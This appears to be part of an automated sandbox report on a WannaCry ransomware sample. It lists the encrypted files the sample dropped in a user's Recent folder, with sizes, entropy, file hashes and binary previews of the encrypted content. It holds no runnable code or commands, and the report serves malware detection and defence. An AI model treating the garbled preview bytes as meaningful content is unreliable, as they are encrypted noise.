                                                  Preview:WANACRY!.......i....n....7....k.v@.".H..-y..L<.H..,.{.u.....;.....W...D.s.....k..g.....[U......S....Y............,.)<SYZ.rK.P.......vP.99k.....[.....cE.......xM."......._....:Iy..u8.q.#;......- ...7XP..k.ZUb.......B.%,H0.<.......5..6....9.._o ...I..>.....?.............g./.:&>.........Y.."oBTmC..X.....~..X.d..Pd=....(B.w...L../...y..DwZx...J..a..X%...{K.)'...D.L...}jb#....<r..$..c2'...-..?...0O:..........y7j]X.j.r.....w.....x/G.No.J9.[.?!.>....=....a...c.f.......e.,P.ub:..?..c].rqm...r2..8..&PA..+.%...j..w....>.aG.t...s.-.eo...#c.L..\......!....N\j.#.R.vC..E.<$...4.....G.,...^.\.....5...y.i.H..b...f0...J....&D.Y/..[.....E6..`.R.D.....P.4.K....lb=....$6.y..3..'z....."..I....U.!.,s...$.^....F'W.I.....a...`ZA..^........x..^%....r..h..a..U....GX./|.f..PA...g>I.T1.q...R0..Q .]UB9&..w.y.U.P..t.w.5..C+..?^..9....2...yP..V:.?0n....\.~}......07...y.N.@e....53...5-.T.:....P....&u.3....H..d..+...O...'....H..A...LV.....1.T.........\..S=.

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NYMMPCEIMA.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.823861494408535
                                                  Encrypted:false
                                                  SSDEEP:24:bkY84SY4oOchCC2Kq4U3fq1ithBP+UAYCQn1fHfVkSXIlAbA8+qv9KJ7SJix:bkNY4Dch9mByGTP+UA5QfkSqA5z9KJ+w
                                                  MD5:26F1655C95582D20A29121A663F9DB58
                                                  SHA1:797EAD6DAC74C60A8BD204ACD6D537389D932E5B
                                                  SHA-256:2F30EAFC4B411F3939DD860A126C140ABB27568A7B24BB8EA20441404D52D742
                                                  SHA-512:05E9199D2A0FC7187A046CA6A0DABAFD2C8F91FEAEEA0D54E96BD2DA7592C4D70D0D71CF8E0122A5D586D88A36213FB84E14122715F3C592E9C6C20FD9AA509B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....K..;....m..n.WQ.b...X....k~..g....9..B..G..O....k..X..7.:~..*..!4.oh.?.O.xAm..^z...r...QVTQ~./.0....s8....:...h..f.0...s.H}.h..s..O..x^..X.G6X.w.....N...=..r.5...................9..r..".`.{..&Q....og...Yw.......K...R9...../...EF..(...X.\.a.............U%L..Vk;N6.......B.'.Z.DDM~4..L...{C....F.A.:[......w.........Y<o<..........,^.. I9..#...X..h.s.......q.%.z.<...L..,..".).....Q..hk1....F;...lu.........:.VH..gu....xb...4..X....3...'....e..P.<.....4t.../.."...+.........o(....I..0.:I..\\.W..T....W...T../.,.t<.r6.zYI!<.j_...^p..d.?#.;t)s+..(.I..B.uOc...!|].. ..p...S....y....7..g.. ..C...U W..aOB..*..H..U'T....k.u..t_...f.`?&.W_..8.@&.3h...].^@{.r.......Ek..`.....G0...L8...~.......3...%m..;.c_...(..s...^L..Q....DO.Nh.*GJ..u.z...:e'....H..[.6.G.....`..h.9P>.n.....*.1......Hk.a.........p.U..\6....)'D..&1?'7.\.:..C3.......$.B..Y..0...q...........3.?..@..R....9/.0[...Ry=.r..=EQ(t#*n.KO.....cV..wm..Qy...Z.|.dU..........te..D.WW.6dr.c.K

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NYMMPCEIMA.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.854876666404128
                                                  Encrypted:false
                                                  SSDEEP:24:bkym+lkJ9UrwHM0YW99j2XPEmDDb7195S1su6N0haX2obkIiMlMUR:bkz+yzEaM2DasaD/PgCu1hq4RuXR
                                                  MD5:8DA76DECA4032F605A39501B56A97777
                                                  SHA1:4E4461AE4BE7DFF6DA9FB719A97DA45712EF31B1
                                                  SHA-256:8275DCA0C2128624FB855C528B4BF70783EE82BBE1F85001316DD4B5569538D2
                                                  SHA-512:67BBB62E522583A5F6B0DF708359FA27CBBA8608F98E85E7EA7BECB640CC0F10A22E050EC3C58A4208C8E8AE90C0F5303D1BF3FDB9B8EB5970F5828573E44AAF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....5...8.Z../@..c.,RrZ...`.L../)....of$...p...j.])e....>....."}l..8.........g......l.y.{r.yf..@].y.r.r..N...sD.[|..........y..F..^...H.@.Qw.y.X+KD9..M..y.eY.d~2........8....^..\.^[..."..iY!.............E...?..x..x..^SY.x....Uk...........Lr<E.................h.....5.....-Fg.. mB....7e0/m?.]..4../.ITF..@wu..k.....m5?.D.L.%..yV77+.D.T....!J$J..........X.w..H..0...-..o1...<4..hEO:.].u...?.'B.......0..U.....X.(d..D2.Pm..Z......n....kUBKeB.7.4xg....um.,.W.$..i.Hg..P....<h5.D.@..........1.). ..( ..j2.'Y@S...r..0.Sm.p.YpL...-....../...I.....sg.....I.....c.T;o.o....._...a..N......#..5...,.\..[..=c.T.*o-.. ..s..;....J...+.#z.Jc...`..0..k.........9.jJ.._o..?...7."5.@... ..\.$D...A.N....7..`.0m....E.!P!o(Z.q(.....+.R.B:9.H...2.:...".X~W$0x[c~.%Q.b.F]./.mH..q..nR...'$~.....i.....`...1..+....tcOSq...W..J.{..VBf.>...).&3...u.}.E;.^x6-..}X=....z{fA.VC..=...o..J.L{...uc.@H..B.#...fU...m.f.u@67n.r..1......Y]~.Qk..M..vJ.-....n.......a.+#.R.?..Ej

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.831882631044693
                                                  Encrypted:false
                                                  SSDEEP:24:bkY5XxgiD6Ncz+RzkOwTmYES/f8qsjWS3+/JhTote/HhRx64ES3wc+:bkBgIczAkOwynYfnslVte/hRx6ZSQ
                                                  MD5:26D459BA1EE3B9220F4D9632C21793FE
                                                  SHA1:E0465BB3BD6C673E572B8F5C7F1D928B118683DD
                                                  SHA-256:A478958C566E764EFBE6501481A4E82CBAA339F2780312A1F42E5DE747704319
                                                  SHA-512:7E688294CE6E829CBBC7F28DC14FEB56675417C62F7820779F09909FBECD3F919339408DE26B61E8F17489AE659DFE8C13294EF6C40438DD2B3ADC4ECE293B8C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....<.vv.L.....OF..F........JA.ez....y...."...%.E..:.3EzdhY.m.q.....d?..x.S...........}....(..6J.<S..UT.j.\........[-M....5.F.|h...d.>..Y.w.......g.$)`.^S2.q>...2s.P.u.....0.vF...j.Y...h.....'>..-..._.m.)...V.......t.5.QEN..uW.oy...%!...>..,b.............Lj.....q.fx/....uN.V.v.hO@.......iQ.&...uO..o.._.{..+#.g..N.y...R.`.>B}..-..0e..2.....+]......EMV...j4.. ..qk]....}.U]..aO.^...bA?..'...l}..>e._m.w.........-xAN.*.a..."!cY.K...I....(.y...TC...1.m.-..*.k.*.K..6I.....?....`........j.|I.aw..ab.oD.f.#...X2Q...k;b......Q3g..v.X....J...J...h)Z).Qld9....9`u....>..,'._.\|....U/7........0u..7..+......{........h..nz....[Z.. .,X...8.....~L.`.0...h.`/..J....z..l....j.\#$..;....T.qY.Y.D.'h:.%........'...S.:f....Izm.eS.Tn..ow.b..x...}_.=..*...6d....%.Fr.9....TJ8..(cM..g......9.OQ.......r.O=...e..!).....m.... ..].DF..'....1....g....#..s.Kf.%.YXG7{..V..uQ.h..%./.j`..4....>.A.9.I..\cnK.T.q.4...,.#...;5=.s^....(.BI..j....b.u&_..r..[..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWCCAWLGRE.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.860328561517608
                                                  Encrypted:false
                                                  SSDEEP:24:bkb2MhDvcXJ6hTckfIOV9h+oLPMyENGwgwfG2rEm4KDZttVLqZAMe12S7:bkbDhDEXJ2ckfZRLPuGpKrEm4MZYZ+2o
                                                  MD5:6F702964BA64BBBA60C5AA43F5D22AD5
                                                  SHA1:8AE79AF3E61F42967C0B0E7D629BC024BF9EADEC
                                                  SHA-256:F2E061DF1B07A1CAF284C08D86DD8F36F4795021E493AF1161DD60EC2C0724F9
                                                  SHA-512:DCE198D45F91C1AA60A9C7FC142AFE45F624F288B01AC679EACE1C77EE42E97E7743AA4626B8903AA919FCF9AEF62403856D55C722E0A68AA81B949460485022
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......X.G.a...S........4..x.L.M.,..,.2...TY.t6.; ItPo'.....[.~0O.V...!.....O0O......dG..CzMM..|-......./...J..e"......./.p7j.....JF{...*>W...O..'z........d= .h.7b..S....j9...R...y.U.w)...n.AMr!<.......G...[.c.T..JP.G_O;n....I...\.l...L.;....q.............G.MQ8.k.%..I.1...6..%Hf......'Z.{{gz.~.GKA.......cRi]g...i.?7....-..;.H(..(..mQk..]U-Ag...... %...]}....g>..i{S%...2]re..e....2J....k....o(..,=. ....~....J....< ..8.t.S?E.....E...:..2..Jr.d....->....8.._..N.EI...........O.,j..146&|.`...:.=\o......H/V..$...0..}OX.NX4..{.A.Mt"..>o....V.......{.w....5..]..vxi. 4....JBm..Z...sI...{V8E..N..&rk.....`....M.o'...=.........mP.....~.#^t...-L.......h...p....L.b..lF6c.>Y].+{..4f..I....)...u.....T;f...^.....!......!.Q.&..p..X...P9..b.....?.Y..J.X.l;...32d....~.[.9==...$.....P.......*.0.yzXn..GxE.>=........S....9....#nG..../..a.....9.kN...{.Mo:.q(@..+..+...1H...K....5...8...........Icn....Z....Z...........e...h:P.d......t..&t.EO.P..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWCCAWLGRE.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.861835322984556
                                                  Encrypted:false
                                                  SSDEEP:24:bkEsKPlDjhCP5sImASdZ+JnptlYwCO24ITUM9/IRF4gI4xJ0ICpxdQYanyvZWaw6:bkEXtnPImAgYbtl2L4IoM9/KF4gI4xJi
                                                  MD5:D7E8D50021019949C55044C0E0E0C8BF
                                                  SHA1:8FD4CF8C1107039791B825BF434B0610A2282B69
                                                  SHA-256:FA14F8519FC7FBE1C5D574DE356D9119F082781143CBF9CA3E9D3FE8A3FD6175
                                                  SHA-512:A730EEBC06CDE8E443DED0562754C6C183A7E4DD2998FB2D30DC0A00C36521AC2D28E6E33CEC995AD0EFF72E3EDB5A735ED178165E4DC2452D4B1B4C11B8C844
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....S.1n..i...O.........q....#....(d:....]n>w. %....r....Y.`G?....\....!.$.Q4.=gS.......G../....x^3.N...,.>ar#F.....ts..y..$.mZo...".<.......TB..l6.ZW@......p.....p.\..i...n.@fZ_.||:o>'..D*.B/......6|W ..v.d.<P..G.......q......<..[.?..`....C....3............(.C...G....&.../....e..].$..0.Ap..b....!...Zz...3..v.....R|.N...R.s^.....m....:....C..V.UJ`k.O..X.t5........u...0.0.....w.;...F#Ab.......K.e....lxk&z..m.....{.%.9@...._.3..../b...w$Z..L2.......m.t$...H..s..?Q.-Lc.r....{..1.../+N.;...%M!..QZ.*=..`.....L......M.(,..%.....u..A...Nx..\.~s....~.E...:d ....3..j>fO.....S!Q-..U&....e.~z.[5.p....N..Mc7.h..%..J..G..(....B.c.G.hI .Y..h..n..5..:`...K.7.$....O5kd.f.'.t.[.H.ul...Wv^......c.}...wTTcbC,}......P....x./...0......b..A6;.....p....(....V{S.|...r.O...5{.6u..%X{..G.9..9../Q......d.Raj..M'.k.g..../......;.....~...:="...!;y..sb._..O.W>J,........}BI.r.....s,(./....K?!.X"6..'?.x....>....e.":..<.i..$=..K..t.....t...=.W...ZR

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWCCAWLGRE.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.839722427521709
                                                  Encrypted:false
                                                  SSDEEP:24:bkjzvoE+Bfk3j3hJ1Ak2z+kUZvl0LVe6+w/ft6iNso5zNas:bkjzJ+lsj3hJik2rUZvlMVeO9bso5gs
                                                  MD5:34606F3A41D318DDACF5FAA774E2751F
                                                  SHA1:07E216DCF0829C46B774000D18DB5404CAD51DCF
                                                  SHA-256:AC8CECD1448AC554304A566AFEE89DAF5A2B5EF0A8123F1776A349C54F7B0CD0
                                                  SHA-512:D580836BD02C8E11BFA05720169D64B7EDD6CD2C998612D503BB59C6BB59F42CEC4B49086351949F2774CA64E6E21A4FEA6377A190CEFA3BF925EB41265EBC3E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....B....cA./k`.i._...C.e..V2.....E.....j.d.W..]YY....`9#..3}O......^.Y0.(Lz.W. .t,)C.]............%..VZm_t3.....e.%.+......\.K5.......=.$....B.E.9.....!..k0.l:....]...... ~;...m=5x.tA.K..s.dS....b).. ;...}...f...nI..........>aX.v...I.5.a.V...K.............j.C......y........3..H...W...>.U...Mc...g..7....@9!..&..a.).uh.4h...%<.{>y......<1TM...B.M`T..8Z.$...B{..n..a....1.P.....$8../).j..L....tJ.;R.{.#.|.j&~.Mm..#_...v....gGh........e_i"...Y.m...i.?.X...]..L......v.(Z.......Ck.}.......k.@.......9..8.|.E.r......<d..#....n....d...W.Sj.+...I...|gf.e..%E..c........T..<0.+ijm$3b........e..S..w.i....u.g..U|R.. .}...B(Q..7...F.qz..........r...m7.:..,.j7.C.[RK.Bi..K....N"h...qX.l..{..%....$.$.k...an.......5-bnI..E.........acq<b..p.q...D.3U+.....sms....l.}K ."-Cmw>.s13.G./I..B].`.%.....v"aX..z..w\l.y.....Aao.`Ci'..K+.K...}d./.J.\-...j...6.M....~..6Zuk.. .........u_...(s..F.>u{..........]$.lZ.........[..h..&p.V..[..3@....]T.m|.....;H

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCFWYSKMHA.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.836745480204268
                                                  Encrypted:false
                                                  SSDEEP:24:bkdMD2eJbuOlWLNDeHihRbG2JGs6jJUWXuKcR3CbtwKpikg5BLk3:bkdMDHNCgihRbIj7XuKcyTETk3
                                                  MD5:10A0B5DE9E7ADC664B06FF879D26EDE1
                                                  SHA1:02E8D8DA942A094D5E94CC65E717D7EBA49A7DF6
                                                  SHA-256:DDF8BA1D5A7E0A8A1B963098E908E7EA07F0943096F4928312AA8E14741D2B26
                                                  SHA-512:E4114B3A3B42B42637933FE4C81F48560D64FA9022BA66248C204A547E9D41D9E9CF5866A9A07A66B5757FCB6F8470151B0B906AEE9A97528FDD388E398AA749
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....[.KYm..(.d6lj..5...X..%.b....FC@<....b.X....u...?.D)._~...6...{0%..M.|..3.cx..3......2[...c..'.i.M...[..|dZyJ...n....7...O~1..l.(O.- ......6.8$.#.k.-.7.DD.x.H..................1..<9eV6.......9/J...RV..k.d~v.$.k|.olS......4!.n....{J;d.[..Q..............tu{jd...2....]...2.H.n&...BTn...j1..Y../.W_sa.vX....1.36.'.n..y.+.&...F...5X....\.q.........\u.s.KF..v...(..|.l(....q..Z..S.@2..S7".".lM..X.0...Ft.%a.8.0...P.2.....G993...$m.@...G..{..r.E..k.\.A....To....`+.O..h.q.eu#..z..*.@.lQ..u....H.-.^Sm..C2.....7o...kR.&.E..r.r...Ui.|.\.M.t...c.!0...SW..v/d.2.l..Vg...kl.Q...4d.f|.....nc.E..../.B...v.)'.'m..b4h...F...]..:......T.....1...]....l.5.1.......k..{Y..)v.z/n(...DP..D....0...n..'...ZA..E.e.Cq...P....N<...5L....1......y.......TA}$rtX..L.i.....0......py>.H.....SY1.j..k..S]....A...5.".....9...x.YF.N..1.I..X..@..>.d[.....$]c..N..m.zAX)..P..3.6...o..+R....)...+...x.......c..../.1.R.../a#..X.Q.....9..u.#n.{.U........[&!.i...3I.]...

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QEURJOJQOH.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85947636127693
                                                  Encrypted:false
                                                  SSDEEP:24:bko4CzWsS2kNgGlvDnOXwj3pcqyWFGdAZN4YE2ZCBk1Wgdnibjq9Gr8o+AYfcKsy:bkqzzpkWGpDtGa74eCBk1WgdAjqov+A0
                                                  MD5:451571151F76AFFC5C001B67FC3C42A3
                                                  SHA1:6E5D489FA2B80DEC5F6424A1A69CC1E76F12AB9D
                                                  SHA-256:440EF8CAEA4A219FFA10FCC4452D05DCDD6D63FBD986755B0D2DA8C2B945647A
                                                  SHA-512:DA1A95633211C55A03152B770DF72A4AE750A4F6A8E08D3B49B6AFC6B1BE9E055FD300568BE776AC68495DF1F3FE0B54149BBBCA870B3DE67C82E21D884A12CC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....Y$.v.o.g..G.#......%A..T.....u.......&..!'......4}...TQ.A.pv3xq....$......U.........=7..a2?.R|.....R...@v..M..7D.ti.H..#..j..6B..#..a...a..].a....?..\.i_.......k.m..8.K........k....(...wO.Gg.j....I4.F...%s.{.'v..D.`.$.'..C.c.>NJ'..%r....r7.~....[>%............_..r.t.6...X..e..#.u./.G.....WDH/.Xy&......, j..C...o.r.S...<,q...R...1D....^..S.DD..A#.P.$.w.x..h..L.....{+..p..pj...g..r^[.>.....Z..]..Cq...n.b.LO[..<..O...y..d0TO......[.\p..*....x..P...$.{A..I~.0o.Q.N.....dr.3..._..Q:...`.R:..7T.....O./3...F{!.>....n..~Tr..H...,U.]..E_c0.......J.;:DV.KR....$0...`...........MZ.m:k..'KX...4....,.~.w..GM.8.....6.B..`..D.Q..k..OYmDW.. ....b/g@.Dk.!.<X"..[...Wf..fo/(.1.2s...8...$....,;..>.......0.1t...Z*=..p'.=..........G.....M.+.,h...&...P.2....o...l.Y.]w.K!...?...w...jS..v.T`...Wc...{.?.F'm;O......I..w....hg...Bk..q.Og.....G.V/.X6...l.h&d..KD*uL.=b..0.;..}'.GC^....Q.|K.. .h_Y.......<..._xV.\.3....".....G.d*.P...zL.QMM.....acb._9...... ..}O...?

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QNCYCDFIJJ.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.837995244631193
                                                  Encrypted:false
                                                  SSDEEP:24:bkU6p2EzABs0bvv2cUYjIvnyHbe5VtcDAGTmmuzyn0hBIazb+GyIy+z8H:bkU6MEOzgVAyRGT90hBIa/+GVy5H
                                                  MD5:B1C00284657B116708C8CF5E77EDA5AE
                                                  SHA1:33477415B3286F0B2ECDA5F1EA3CB327256D1A17
                                                  SHA-256:4D2CBC0960AA419DF398BB3524C1A77A530EEF75A209720BE73649E9820A1F81
                                                  SHA-512:44FBFB0BEF29E3A9F1A30F6FF0E16325604918AACF2E84FAC1C5EAF655EB7BD776D875E10E17317BD1858A84E441D59144DD7FE379E549651741B42806BFB9A4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......Z...&H...bl.q.a..\S"..1...!.'=@.o..H..<:..C<..,....9`a../.....|wX.'.2L.s".h.A:.Q...5.a ..q.a.hC...s.fV.......)......./^.F..<..p.n.;..;&.e...~.b.....h[..=#.j..!...5I%.cH.....)V.a.P.z.N#.U._.&.....S.......y.7.../ka.K4...D ...e<..w.XJ.....Pc................N.... *......'i.>Y|.l..#...Pd....d.q...4...3YK.......s}.nIp.......<n.s.nD}E.....:$Y.V.VC...B^"..LQ..s.2Jp.Fx..im.[z8.#Ra.>..=.O@[ks.^.r.....I.Y.aRK.)M.......+W+..C.0..b..G...Az....mjK/..VP..<v.z.w.A'n......d.....c...c'%.@.=.SQ'..L.l....a.XH...D..g..7............mZ.,.K....1..i~..9".[........N4.m...|.8<...>..g.b....I.........6..-h./....[k..w...B....Q....?..c 5...e..n../`r-......x....S..K........6J...VS...O)?.a..+.g..)..?......t..XE/...^.|Z.4bp.g.k...cJ4..4EUF>....T....'...^..SW....H.P....\.;..=.i..k......cq]..u.%\.'^......?......}|....g.\=....~6.ON.?..d,+.......&...P.!..@yA....w...CO...Rx.......#...e.nC40.......fuI.E..V.?......P.t.....iq...pp}P.?..s{....`..9B.o.?G.bR.../.P*.&{......%.

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QNCYCDFIJJ.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85512783623806
                                                  Encrypted:false
                                                  SSDEEP:24:bkNx8Hw0Ir5L4ttY8HWiBgSkTHyY/OWq8iYGSUsg25vJLecT0M8t5m2F7XKZdnCI:bkkQ0iLE1HpBgSahwk5vheY0BPmI7T8
                                                  MD5:3D8086BBD173F8231A745F7C2C9C0C90
                                                  SHA1:E0B6F9FA720C866CCF818EC896DCE57A769262F0
                                                  SHA-256:934BEC187C6CB58A61C044D69CC6D36CA7EAA2905711BCEE0FEE7429309E4DD3
                                                  SHA-512:94C8255AEF4DC9C05169AFC4008AED2A595E000E3AB3BDBD454135B47073401AAD0B373C2DEE87B7C48C13148DD4C262AE720C1FBECBE70DB1546066DDCFBE29
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......@.A1......d..O.j..a._.o..C.....d.8V.BVu_.G...%%..t[.@q...+.|..&..Z......p.......Wh.=.......!Z&3W..F.!...!......6$B......i!.c.?86.h.r....o..x....Z..!..p...]...)...lA.W~.....A^J...IG3....y.+~.....t..)..15..].#T[.,.E..N..........>V....9.Y..4*@..............(....0..*#q...<Y.....K....=...bY...2....2......_..B.... .tAQO..Rhf...J......B.Z%..q.1..98CR.e.[..H.5rvF.h. ....`z&.Ri.T....\9......6.m...e]R<.....c.k.b.yP.N.Z8>8.a..e.o?...6).!..r.,.u.......B}.b.ll.>...%.w.3WcdH5vp..|..aC.Td.+....%...Y."vs.!x'....-O1tF.$2.5iC.iR.a.*...[.~..j.cT`.m..V...U*.....&.7A\[9....BV.GV..k..?.n.p....s...R...3.`..../..&O....'#r.f.........k.."-..b%..5.=.....w...Y_.P..bvf.I2...+Oi.;....,E....d.............s.|.......&.h.2g..f../S.......j.G....u.*-p.......Xz=......oJ...)........w V;Qi.D.#e...H...Gf.7.1...ha....qNFz.}..c.t.)Z...=.8.....yp...w*.g..C.^R.,...q..].......X...;..s=4...&.?...xl...C..n...q.Wp.E..#M.6u.t.].h.Q..9.....F/^.l.bE.....D...J.t.b.-. ....o!~

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8528554217771465
                                                  Encrypted:false
                                                  SSDEEP:24:bkozntZRVYmh9gyha0sR79843TBBzeKazqJBjOngcTnI51hgI1EpGX:bkGnnP5hHcF3NFcWd8HUXhgJMX
                                                  MD5:31933FE4B281BAB536A3BF7F304864FF
                                                  SHA1:DAF90D2F390DEFD924EA66097E6594A9EB785969
                                                  SHA-256:19D28318BF5DFE48CB47CE5D3D2AF792AEC6A84729261CA58F31055437AEB3E3
                                                  SHA-512:FB2F91BAF72D932EA8E2EDD8A3CEB908326313C7CF791C19ED147B66F296DB916DF3ED7C8A02E381252C00D1A1AD9327328415B104D3D6C27D944A9318558918
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....g|.~....#F`j-v.....8..-..B .......d.8.$......9.q..9(......y<.pS.........k...+.7.@y O.q.h.5KH.;.bY...O...{..2wV ..`?J ...........=...MV.W.cp....!yb................. ...s.."j..+u.P......r{iC.byAI~+N.w...{....?.;L.|.!.d.=.W..b..u...|M+..h^es...............q.&F:._.+/....."..._.!...:@...4U...U..&R1.4..U......S.mfd..Y..5..Q..w.*.F~...^..te2:s.i.v.3..qB..+Y.......1...Q....3....f../qd...........OK.w%F...-.C.0,...&.o#.I...K.]$#`.E...".'..b"....!wB %...b..q./...{G..1..l...&o..!\L..f..k......G..R.P%...N.00....2...=%.k...(C=|.{e.b..............GT...FX.2.j.Z..T....#!...t.G...&.Vu^.uch<.y...Q}Ma. ....^e../_.+!f..T ..@B.72k..|.|.h(.u.V.^I~.>.|.....[...pRz...q...1.J..^.I.'K.Z.\..z;...E..0.S.5..F...H.Z.....-ur%........C...V.;(.I...1m.on..6,...euz..V....6S,...&...L`y!!o...c..n...6g...8b.Z).0..jJy..kn...r.J.C.G...=dC...Z.....8..h...a.........b..._....vl.D.5F.M..OD.7..{..Y.."r...dI..(..+..$"....._...x.s..){w...;.%.1T}..o.6..x.Q....(

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TKDHVMNLST.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.839471053634642
                                                  Encrypted:false
                                                  SSDEEP:24:bkGEhTMdIXvOnuUaiH2hMwpoZ2tQ79RBT5SMDBzVtuxO8uoBjHsk1j1i:bkGJ6vUudiH2gh/TRo0oBBw
                                                  MD5:D3E58DFA7A0F520E82A9B08E2C548405
                                                  SHA1:32E10D0023641AE35EE063641646A2F0DD4EC443
                                                  SHA-256:AD3727009DD6C6E1CE4E8F69591087AA10CF2D12C0C1EC22BA2A719698A202C9
                                                  SHA-512:6025BB681CC95D70E51B68ADDEC1C7C5EEC0187F3AA823B31A253CB59AEB2DE4340DF2EFA5E87BC01E3833191BD1C6768B7ECB68E041BF98EF484E37C04123E7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....+2:..f.....Gy).!U3...*...3.-..D;.,L.L.M..D....+.+9...@......$...jj.V...zv.`...N9C.w..)=. ...p.d.....`......S...J.:....I...y.".3..o..K........X...$..u.....d&.E......\8&-...y.n+.r.)3...F.G,....(&MJ#x>=..D....r........."x.i...+N.#8.......F...@...`.qn................z[M....h......f.> i.\.{K.h../x}S.....2g....(..y..".4V.5^...)....:.....F..k...(..A..>!h...).w$,.:.7.O).g....(.r.H|+n.h.,.....u.@..U......Gf.Xn...@....X%.`.e..\..?...n.@l..A[d..pf.....XX].m ..........mx.Q..!.3.Z..v...~.D..YPd;.n;Cn.|.;_./7o...d...I..._]0......l.5......1.s.;Vz.7..,..m,..v.Y..4:i.JB.,BvIp.Gu.$.`..29..<..j..m...e.!.G..h.1....z.>.o..p..7..#c.fjm.=.2....V...oX....Y.....+.<.k..l...#hk..3.U...;.S..-d.q.Z........s.....J~..`..k..2.`&.$...,..+.........*<..KZ.r....2.:.!.?..=d.Y<...A.'2.....d..%m<.4...p.y.1E..}..D....U.n.d.a.Om...S$}.I..$G.....x@n.....E..}\..{......#)U<.LA...4.....m.b.d.E.15oJNo.W.B9..G..S..a.T...kQ....Q.,..|...........0........y..S...m.f...M.Zc.

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UNNQSMMCXQ.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.871684192188505
                                                  Encrypted:false
                                                  SSDEEP:24:bkoDpWFYaq/ubJ7U3zUtZYZ68e6fxuLiGFOf3aWv0sXuONsCIUNNiaQUCT0:bke5uGws68NpkTFkvvHu+bI25QR0
                                                  MD5:FDA15A5B6685D9AEF726D90E74CB8E5F
                                                  SHA1:31CF19955E0860152159DA35A4F0518C0E888C3C
                                                  SHA-256:BAA8D99BF8C62027463F39B4F5398656880AE9D6905369C06562B71C735A0A57
                                                  SHA-512:C626DCCF771D43FA4F9F970A0429520135285BB403C324B7851910EEB02539C2DA590A7F6A2E8230431E4289E8124C4704CE6555A2E2D1666D891E47864441DD
                                                  Malicious:false
                                                  Reputation:unknown
